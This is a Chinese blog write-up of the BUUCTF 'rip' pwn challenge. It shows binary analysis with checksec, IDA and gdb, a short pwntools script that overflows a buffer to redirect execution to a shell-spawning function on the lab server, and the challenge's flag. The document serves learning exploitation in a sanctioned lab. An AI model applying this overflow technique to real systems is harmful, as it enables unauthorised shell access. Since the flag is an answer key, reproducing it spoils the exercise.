BUUCTF|PWN-rip-WP

最新推荐文章于 2024-05-16 11:03:26 发布
最新推荐文章于 2024-05-16 11:03:26 发布
阅读量776 收藏 2
点赞数
分类专栏: CTF 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2645470582_/article/details/119177260
版权

1、下载文件并开启靶机

2、查看文件信息

 

checksec pwn1

 

3、我们看到该文件是64位的文件,用64位IDA打开该文件

3.1、shift+f12查看关键字符串

 3.2、双击关键字符串,进入反编译代码区

 3.3、利用Linux gdb查找fun()的位置信息

gdb pwn1


$:b fun

双击s查看范围地址

 3.4。我们要覆盖s的内容到r返回地址,所以0xf+0x8

 

4、编译代码

from pwn import *                             #导入pwntools中pwn包含的所有内容


p = remote("node4.buuoj.cn",26058)            #链接服务器远程交互


p.sendline(b'a'*(0xf+0x8)+p64(0x40118a))      #覆盖s和r返回地址,到fun() 
p.interactive()                               #反弹shell进行交互

 

4.1、输入ls查看flag选项

4.2、查看flag

 

cat flag

5、flag为:

 flag{737cb57e-df42-4c84-95b8-9dd7b53afc50}

L__y
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
初学pwn-BUUCTF(rip)
天柱的博客
08-30 2458
初学pwn-writeUp BUUCTF平台的一道题目,rip。 与之前同样的步骤,启动靶机,链接远端 发现这里提示输入一些内容,但是输入完成之后,这里就结束了。还是要打开文件查看一下。 看到这里,只有一个输入的过程可以操作,那就很清楚了,就是要栈溢出了。点进去看一下。 可以看到这里s这个数组是15个字节,到r这个返回值还需要8个字节。不过这里要注意的一点是,这个15是十进制的,不能像之前再在数字之前加0x标记十六进制,这里可以直接写十进制。 摁shift+f12,可以看到这时还有什么地址可能会用到,
XCTF|PWN-hello_pwn-WP
l2645470582_的博客
07-30 309
1、下载文件并开启靶机 2、用Linux查看该文件信息 checksec 2 3、该文件是64位的文件,用64位IDA打开该文件 3.1、shift+f12查看该文件关键字符串 3.2、双击关键字符串,再按ctrl+x查看"cat flag.txt"的地址 "cat flag.txt"地址:0x400686 3.3、按f5进入main函数 两个函数相差4个字节 4、编译代码 #encodi...
BUUCTF:Crypto 解析(一)
最新发布
Flag少侠的博客
05-16 2068
一眼就解密、MD5、URL 编码、看我回旋踢、摩丝、password、变异凯撒、Quoted-printable
渗透小技巧从getshell到3389端口远程桌面连接靶机
热门推荐
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
12-16 1万+
渗透或平时比赛中还在为自己命令行操作不熟而感到烦恼吗?直接命令行方式启动远程桌面连接,让效率提高。
BUUCTF [RoarCTF 2019] Easy Calc
Senimo
03-29 732
BUUCTF [RoarCTF 2019] Easy Calc Web writeup 启动靶机,打开页面: 一个简单的计算器页面,查看网页源码: 提示设置了WAF以确保安全,尝试访问calc.php: 得到了WAF源码,分析代码: 需要传入变量num的值 设置了一系列黑名单的值 如果传入的变量num中有黑名单包括的符号,将终止程序 否则将输出num的内容 根据PHP的解析规则:如果变量...
BUUCTF Basic Linux Labs
Y1da的博客
09-13 461
BUUCTF Basic Linux Labs wp
BUUCTF Linux Labs
李二胖的博客
10-11 1972
首先启动靶机,如上图所示,可以获得登录链接和端口号 使用ssh root@node4.buuoj.cn 26740可以登录靶机,后续结果操作如下图获得flag.txt打印输出获得结果
Python库 | pwn-machine-1.1.tar.gz
03-11
Python库“pwn-machine-1.1.tar.gz”是一个用于网络安全和漏洞利用开发的工具集。这个库专门针对那些对安全研究和逆向工程感兴趣的开发者和爱好者。在Python中,库是可重用代码的集合,它使得程序员能够快速地构建...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
buuctf N种方法解决
weixin_53955759的博客
06-08 538
下载附件得到一个exe
BUUCTF-Linux Labs
duanhwonline的专栏
04-03 509
【代码】BUUCTF-Linux Labs。
关于vulnhub的高版本Ubantu靶机连不上内网的问题
二狗的博客
12-15 245
这个问题想解决很久了,经常会出现在vulnhub上下载的ova靶机装载在vmware上然后nmap/netdiscover找不到他的情况,而这种情况往往发生在ubantu机器上,今天就来好好查一查资料解决这个问题。
HackTheBox :Kali linux配置教程,连接靶机
weixin_45627117的博客
08-26 5146
一、下载openvpn配置文件 点击右上角的connect to htb 选择代理的接口access和服务器server,以及对应的协议(绿色按钮表单),又UDP和TCP两种方式,UDP传输相对较快但是不可靠(注意选择不同的接口和服务器对应不同的文件,因此如果我们拨通VPN后,下次在使用相同的配置文件时对应的接口也要与之前的文件一致) 将下载好后的vpn配置文件存放在桌面,并且拖拽到kali的桌面里面 在开始配置之前我们要先配置好文件,如果kali没有安装openvpn...
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 4917
BUU CTF PWN 入门知识详解
pwn靶机安装
qq_33899138的博客
02-06 464
https://github.com/giantbranch/pwn-env-init 下载ubuntu16.04 解压文件打开即可
BUUCTF Brute 1使用BurpSuite爆破详解
bill_fang的博客
08-28 1万+
最近研究一下白帽子安全,主要关注WEB安全,在做完了常规的靶场xsslab、SQLI、DVWA、Pikachu后,了解了白帽子安全的基础知识。进一步开始用一些CTF来练习。本文是从BUUCTF网站上,去解一个WEB的Flag的详细记录。0x00打开BUUCTF,打开靶机BUUCTF的地址在这里:BUUCTF在线评测 (buuoj.cn),进入后选择Basic->BUU BRUTE1.选择B...
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值